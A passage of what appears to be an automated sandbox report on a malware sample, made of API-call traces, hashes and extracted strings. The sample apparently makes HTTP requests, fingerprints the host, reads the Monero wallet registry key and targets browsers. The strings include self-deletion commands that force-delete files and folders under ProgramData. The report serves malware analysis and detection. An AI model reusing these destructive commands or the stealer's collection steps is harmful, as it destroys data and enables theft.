                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092527E
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00925285
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 009252A7
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009252C1
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009252F1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00925330
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925360
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0092536B
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00925394
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009253DA
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925439
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925445
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925451
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                              • String ID: GET
                                                                                                                                                                                                              • API String ID: 442264750-1805413626
                                                                                                                                                                                                              • Opcode ID: b4dd7dbab0007d68c084eaaa8657ee18339b7160f8440918e1c64698c669221b
                                                                                                                                                                                                              • Instruction ID: 750d110e99d24b246ea82880e856f384826d1e5b0f337dc29fd00249620587ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4dd7dbab0007d68c084eaaa8657ee18339b7160f8440918e1c64698c669221b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C510871900928AFDB21AF64EC85BEFBBB8EF08346F0141E5F519A7160DA709EC59F50
                                                                                                                                                                                                              Function 00921284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009212A7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009212B6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA94), ref: 009212D0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA98), ref: 009212DE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA9C), ref: 009212EC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA0), ref: 009212FA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA4), ref: 00921308
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA8), ref: 00921316
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAAC), ref: 00921324
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB0), ref: 00921332
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB4), ref: 00921340
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB8), ref: 0092134E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AABC), ref: 0092135C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAC0), ref: 0092136A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAC4), ref: 00921378
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                                • Part of subcall function 00930C5A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 009213E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2891980384-0
                                                                                                                                                                                                              • Opcode ID: 4217925d89bae8e54e456b9ce07e6c2a00f893f6e0e4b13b2a3c1b2b95907933
                                                                                                                                                                                                              • Instruction ID: 9471707da133d4aa2b7cfe17ee940f4cb80450a16b1299c97f8c55af25c2e4c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4217925d89bae8e54e456b9ce07e6c2a00f893f6e0e4b13b2a3c1b2b95907933
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B541A3B2D0433C67CB20EBB29C19FDB7FAE9F64311F544691E998D3081D6749A88CB50
                                                                                                                                                                                                              Function 009311D8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0095670E,00000000,?,?), ref: 00931248
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00931285
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009312B2
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 009312D1
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00931307
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093131C
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00956E94), ref: 009313B1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0093141B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0093143B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00931447
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                              • API String ID: 2394436309-3278919252
                                                                                                                                                                                                              • Opcode ID: bc216a0eac781ebb57b6f909f3ee7c297d091efcfd2194a18ff171a5b33fe977
                                                                                                                                                                                                              • Instruction ID: 9fed885dcce80f9d2cfbde50d2d3408733891732fe757f5ed309ca5d83278d07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc216a0eac781ebb57b6f909f3ee7c297d091efcfd2194a18ff171a5b33fe977
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD61947590012C9BEB21DB55DD85EDAB7B8AF89704F1086E5A609A3122DF30AEC9CF50
                                                                                                                                                                                                              Function 009383FD Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938422
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938431
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00938446
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 009385E2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009385F1
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938603
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00938613
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • " & exit, xrefs: 00938515
                                                                                                                                                                                                              • " & exit, xrefs: 00938566
                                                                                                                                                                                                              • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 0093851C
                                                                                                                                                                                                              • " & rd /s /q "C:\ProgramData\, xrefs: 009384BF
                                                                                                                                                                                                              • /c timeout /t 10 & del /f /q ", xrefs: 00938471
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                              • API String ID: 2823247455-1079830800
                                                                                                                                                                                                              • Opcode ID: fbb4eeed19911ed317bc07b0ba9552348d4699fb321695817f5a55ce4696f61d
                                                                                                                                                                                                              • Instruction ID: 42fcea5671d1a60be76330016faa43babd551514b3a61b908c65c275d1e7c008
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbb4eeed19911ed317bc07b0ba9552348d4699fb321695817f5a55ce4696f61d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E5194B1D4022A9BCB65EF25DD82B9DB3BCAB84704F4101E5B708B7152DA70AF868F54
                                                                                                                                                                                                              Function 00930977 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 009309AA
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009309EA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00930A3F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00930A46
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930A7C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00956E44), ref: 00930A8B
                                                                                                                                                                                                                • Part of subcall function 00931659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 00931659: _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00930AA2
                                                                                                                                                                                                                • Part of subcall function 009323AA: malloc.MSVCRT ref: 009323AF
                                                                                                                                                                                                                • Part of subcall function 009323AA: strncpy.MSVCRT ref: 009323C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00930AC5
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                              • String ID: :\$C$QuBi
                                                                                                                                                                                                              • API String ID: 1856320939-239756005
                                                                                                                                                                                                              • Opcode ID: 3f6b6c22cc1d8df25e4763b0cd4d1a981bce3abf2bba2b49587379dff349fa5f
                                                                                                                                                                                                              • Instruction ID: 8d7d079364e12b4040955ef1f78893df4ea0d796e75de60b6a0021eb28258f10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6b6c22cc1d8df25e4763b0cd4d1a981bce3abf2bba2b49587379dff349fa5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B418E71904228ABDB259F749D86ADEBBBCEF4D304F0000E5F149E7121DA708F958FA5
                                                                                                                                                                                                              Function 00936908 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                                • Part of subcall function 00926963: StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 0093695C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00936967
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?), ref: 0093697C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093698B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 009369A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                              • API String ID: 4174444224-1526165396
                                                                                                                                                                                                              • Opcode ID: 4e110a3d5f541031cb2104ce9b4abcbc240cf606774901430244805076458bc6
                                                                                                                                                                                                              • Instruction ID: efb806e2c086fd0d01aeff1e2e93041bc2b66beeba84abb9a37ce72de0c04c31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e110a3d5f541031cb2104ce9b4abcbc240cf606774901430244805076458bc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4821CD35900218BBCB21BF34EC4AAAE7FB8AF85700F508165FC15E3166DB35D9498F81
                                                                                                                                                                                                              Function 0092EA91 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EACE
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EB2B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0092EDF2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EC08
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092ECB8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092ED15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                              • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                              • API String ID: 3722407311-2697854757
                                                                                                                                                                                                              • Opcode ID: 56037c33782ac8afae5367928c45fa46691f76c1f0ac435f6c57bc3b4f64bed9
                                                                                                                                                                                                              • Instruction ID: 5817e9f723a3ee4c6fb56395460e25c02a773e29ef81ad607018f54c18956d5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56037c33782ac8afae5367928c45fa46691f76c1f0ac435f6c57bc3b4f64bed9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BB15D36D00119ABCF20FFA9ED47B9DBBB5AFC4310F554110FD08B7255EA30AA598B92
                                                                                                                                                                                                              Function 00921AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00921ADC
                                                                                                                                                                                                                • Part of subcall function 00921A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00921A65
                                                                                                                                                                                                                • Part of subcall function 00921A51: HeapAlloc.KERNEL32(00000000), ref: 00921A6C
                                                                                                                                                                                                                • Part of subcall function 00921A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00921AE9), ref: 00921A89
